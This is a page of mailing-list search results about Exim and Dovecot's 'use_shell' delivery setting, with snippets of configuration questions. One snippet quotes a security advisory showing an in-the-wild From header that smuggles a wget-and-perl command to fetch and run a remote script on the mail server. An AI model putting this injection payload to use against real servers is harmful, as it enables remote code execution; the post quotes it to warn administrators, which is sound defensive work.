Displaying 3 results from an estimated 3 matches for "use_shel".
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
...email server. The exploit partially
looked like this:
From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
(Obviously edited for your safety, and I didn't post the whole thing.)
This is an exploit against Dovecot that is using the feature "use_shell" against
itself. This feature, unfortunately, is found in the example wiki on Dovecot's
website, and also in their example configuration. We'd caution anyone that is
using Dovecot to take a look at their configuration and make sure they aren't
using the "use_shell"...
2013 Jul 30
2
Calling dovecot-lda correctly from exim for virtual user setup
...ng Dovecot 2.1.7 on Debian. Exim is the MTA. I was recently
made aware of the fact that the way in which Exim invokes dovecot-lda is
prone to code injection:
dovecot_virtual_delivery:
    driver = pipe
    command = HOME=/home/vmail/\$local_part /usr/lib/dovecot/dovecot-lda -f \$sender_address
    use_shell
..
I.e. a command is executed via the shell, and Exim uses non-sanitized
user input (mail header fields) to construct the command.
Now, the reason I invoked dovecot like that is to pass a plausible
value for the HOME environment variable, so that dovecot-lda can
determine where the Maildir...
2010 Dec 19
1
stat(/..../Maildir/cur) failed: No such file or directory
...known account $local_part@$domain
exim transport:
dovecot_delivery:
    driver = pipe
    command = /usr/local/libexec/dovecot/dovecot-lda -e -k -d $local_part@$domain \
        -f $sender_address -a $original_local_part@$original_domain -m INBOX
    #use_shell
    user = mailnull
    message_prefix = ""
    message_suffix = ""
    return_path_add = true
    envelope_to_add = true
    delivery_date_add = true
    temp_errors = 64 : 69 : 70: 71 : 72 : 73 : 74 : 75 : 78
    log_output
And my pr...